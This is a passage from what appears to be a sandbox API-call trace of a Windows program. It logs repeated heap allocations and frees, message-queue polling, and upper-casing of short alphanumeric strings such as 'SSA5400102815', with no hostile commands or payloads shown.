HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0252.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.995] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0252.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0252.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0252.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0252.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0252.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0252.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0252.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0252.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0252.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0252.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.996] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0252.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0252.996] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0252.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0252.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa448 [0252.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.996] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0252.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0252.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0252.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0252.997] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0252.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0252.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0252.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0252.997] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0252.997] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0252.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0252.998] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0252.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0252.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0252.998] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0252.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0252.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0252.998] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0252.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0252.999] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0252.999] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0252.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0253.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0253.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0253.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0253.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0253.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0253.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0253.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0253.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0253.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0253.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0253.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0253.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0253.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0253.000] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0253.000] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0253.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0253.001] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0253.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0253.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0253.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0253.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0253.001] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0253.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0253.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0253.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0253.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0253.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0253.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0253.002] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0253.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0253.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0253.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0253.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0253.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0253.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0253.002] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0253.002] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0253.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0253.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0253.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0253.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0253.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0253.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0253.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0253.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0253.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0253.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0253.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0253.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0253.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0253.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0253.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0253.003] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0253.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0253.004] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0253.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0253.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0253.004] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0253.004] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0253.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0253.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0253.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0253.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d960 [0253.004] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0253.004] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0253.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0253.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0253.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0253.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0253.005] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0253.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaad8 [0253.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0253.005] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0253.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0253.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0253.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0253.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0253.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0253.005] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0253.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0253.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0253.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0253.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0253.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0253.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.006] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0253.006] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0253.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0253.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0253.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0253.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0253.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0253.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0253.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0253.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.007] HeapFree (in: 